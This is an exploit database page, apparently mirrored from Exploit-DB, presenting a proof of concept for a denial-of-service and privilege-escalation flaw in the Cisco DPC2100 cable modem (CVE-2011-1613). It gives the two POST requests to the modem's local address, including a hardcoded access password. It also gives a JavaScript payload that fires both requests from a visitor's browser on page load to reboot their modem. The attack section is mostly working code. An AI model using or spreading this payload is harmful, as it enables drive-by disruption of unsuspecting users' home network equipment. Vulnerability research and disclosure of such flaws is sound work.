Lucene search
K

Cisco DPC2100 - Denial of Service

🗓️ 26 Sep 2012 00:00:00Reported by Daniel SmithType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 41 Views

Cisco DPC2100 Denial of Service, Privilege Escalation and Modem Restar

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Cisco DPC2100 Denial of Service
26 Sep 201200:00
zdt
ATTACKERKB
CVE-2011-1613
3 May 201122:55
attackerkb
CVE
CVE-2011-1613
3 May 201122:00
cve
Cvelist
CVE-2011-1613
3 May 201122:00
cvelist
exploitpack
Cisco DPC2100 - Denial of Service
26 Sep 201200:00
exploitpack
NVD
CVE-2011-1613
3 May 201122:55
nvd
Packet Storm
Cisco DPC2100 Denial Of Service
26 Sep 201200:00
packetstorm
Prion
Code injection
3 May 201122:55
prion
securityvulns
Cisco Security Advisory: Cisco Wireless LAN Controllers Denial of Service Vulnerability
2 May 201100:00
securityvulns
securityvulns
Cisco Wireless LAN Controller DoS
2 May 201100:00
securityvulns
Rows per page
# Exploit Title: Cisco DPC2100 Denial of Service
# Date: 09/01/2010
# Author: Daniel Smith
# Software Link: http://www.cisco.com/
# Version: HW:2.1/SW:v2.0.2r1256-060303
# Tested on: OSX 10.6/Win7
# CVE: CVE-2011-1613

=======================================================
 Information
=======================================================
Executing this script on page load will cause the users modem to restart when 
they visit the page. This example uses javascript but can just as easily written
to in another language to accomplish something similar. Attack consists of
two parts.

Part 1 - Privilege Escalation:
POST: http://192.168.100.1/goform/_aslvl
PARAMS: SAAccessLevel=2&SAPassword=W2402

Part 2 - Modem Restart:
POST: http://192.168.100.1/goform/gscan
PARAMS: SADownStartingFrequency=705000000

=======================================================
 Proof of Concept (Javascript)
=======================================================
(function() {
  var b=document.getElementsByTagName('body')[0];
  var otherlib=false;
 
  if(typeof jQuery!='undefined') {
    console.log('This page already using jQuery v'+jQuery.fn.jquery);
  } else if (typeof $=='function') {
    otherlib=true;
  }
  function getScript(url,success){
    var script=document.createElement('script');
    script.src=url;
    var head=document.getElementsByTagName('head')[0],
        done=false;
    // Attach handlers for all browsers
    script.onload=script.onreadystatechange = function(){
      if ( !done && (!this.readyState
           || this.readyState == 'loaded'
           || this.readyState == 'complete') ) {
        done=true;
        success();
        script.onload = script.onreadystatechange = null;
        head.removeChild(script);
      }
    };
    head.appendChild(script);
  }
  getScript('http://code.jquery.com/jquery-latest.min.js',function() {
    if (typeof jQuery=='undefined') {
      console.log('Sorry, but jQuery wasn\'t able to load');
    } else {
	  console.log('This page is now jQuerified with v' + jQuery.fn.jquery);
	$.post("http://192.168.100.1/goform/_aslvl", { SAAccessLevel: "2", SAPassword: "W2402" } );
	  console.log('Privilege Escalation: temporarily setting SAAccessLevel to \'2\'.');
	$.post("http://192.168.100.1/goform/gscan", { SADownStartingFrequency: "705000000" } );
	  console.log('Reboot command sent.');
    }
  });
})();

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation